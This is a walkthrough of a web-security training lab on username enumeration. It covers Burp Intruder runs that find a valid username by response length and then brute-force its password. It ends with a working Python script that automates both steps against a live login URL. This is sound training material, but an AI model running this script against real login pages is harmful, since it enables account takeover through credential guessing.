Username enumeration via different responses
The first step is to capture the login request with Burp Suite's intercepting proxy.
As shown in the request, the POST body carries two parameters: username and password.
Send the Intercepted Request to Intruder: In Burp Suite, send the captured request to Intruder. Clear all the automatically selected positions and mark only the value of the username field as a payload position.
Configure Payloads: In the Payloads tab, paste the provided list of usernames.
Start the Attack: Initiate the attack to test each username.
Analyze the Responses: After the attack has completed, sort the results by the Length column.
One username will produce a response length that differs from all the others.
Rendering that response shows a different error message as well (the message returned when the username exists but the password is wrong), which confirms the username as valid.
Once the valid username is known, brute-force its password as follows:
Set Up the Password Attack:
Repeat the same process, but set the username field to the valid username found above and mark only the password field as the payload position. Use the provided password list as payloads.
Start the Attack: Launch the attack to test each password.
Analyze the Responses: Once the attack is complete, sort by Length and Status and look for the one response with:
A different length from the others.
A status code 302 (a redirect to the logged-in page; Intruder does not follow redirects by default, so the 302 itself is visible) or a success message in the body, indicating a successful login.
Result:
The username and password pair is now verified, and you can use them to access the account.
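The same two Intruder runs, enumeration by response length/error message and then password brute-forcing against the discovered username, can be scripted. The block below is an added example and is not part of the original page or of the PortSwigger lab; the error strings "Invalid username" / "Incorrect password", the credentials in the constructed fake endpoint, and the lab URL placeholder are assumptions that must be replaced with the values seen in the captured request and responses.

```python
"""Scripted version of the Intruder workflow above (added example).

Responses are modelled as (status_code, body); the "Length" that Intruder
shows is derived from the body. A sender function is injected so the same
logic runs against a constructed offline endpoint or the real lab.
"""
from collections import Counter
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, str]
Sender = Callable[[str, str], Response]


def find_outlier(results: Dict[str, Response]) -> Optional[str]:
    """Return the key whose (status, body length) differs from the majority.

    This mirrors sorting Intruder results by Length: the valid username is the
    single row that does not match the rest. Returns None if there is no
    unique outlier (all identical, or several rows differ).
    """
    signature = {k: (status, len(body)) for k, (status, body) in results.items()}
    counts = Counter(signature.values())
    if len(counts) < 2:
        return None
    common, _ = counts.most_common(1)[0]
    outliers = [k for k, sig in signature.items() if sig != common]
    return outliers[0] if len(outliers) == 1 else None


def enumerate_usernames(send: Sender, usernames: List[str],
                        dummy_password: str = "x") -> Optional[str]:
    """First Intruder run: fixed (wrong) password, username is the payload."""
    results = {u: send(u, dummy_password) for u in usernames}
    return find_outlier(results)


def brute_force_password(send: Sender, username: str,
                         passwords: List[str]) -> Optional[str]:
    """Second Intruder run: fixed valid username, password is the payload.

    Success is a 302 redirect or the absence of the failure message
    (assumed to be "Incorrect password"; check the real response).
    """
    for pw in passwords:
        status, body = send(username, pw)
        if status == 302 or "Incorrect password" not in body:
            return pw
    return None


def make_live_sender(url: str) -> Sender:
    """Build a sender that POSTs to the real login endpoint with urllib.

    Redirects are deliberately not followed so that the 302 stays visible,
    exactly as in Intruder's default configuration.
    """
    import urllib.error
    import urllib.parse
    import urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # let the 302 surface as an HTTPError instead

    opener = urllib.request.build_opener(NoRedirect)

    def send(username: str, password: str) -> Response:
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        try:
            with opener.open(url, data=data, timeout=10) as r:
                return r.status, r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode(errors="replace")

    return send


# Constructed stand-in for the lab's login endpoint so the logic runs offline.
# Credentials and messages are assumptions for this example, not real lab data.
FAKE_VALID_USER, FAKE_VALID_PASS = "carlos", "secret123"


def fake_send(username: str, password: str) -> Response:
    if username != FAKE_VALID_USER:
        return 200, "<p class=is-warning>Invalid username</p>"
    if password != FAKE_VALID_PASS:
        return 200, "<p class=is-warning>Incorrect password</p>"
    return 302, ""


if __name__ == "__main__":
    # Replace fake_send with make_live_sender("https://<lab-id>.web-security-academy.net/login")
    send = fake_send
    candidates = ["admin", "carlos", "root", "test", "guest"]  # constructed list
    user = enumerate_usernames(send, candidates)
    print("valid username:", user)
    if user:
        print("password:", brute_force_password(
            send, user, ["123456", "password", "secret123"]))
```

The outlier test is what sorting by Length does by hand: it groups every row by (status, length) and reports the one row outside the largest group, and returns None rather than guessing when several rows differ. For the password run the check is on the 302 first, because a body comparison alone would also match an unrelated error page.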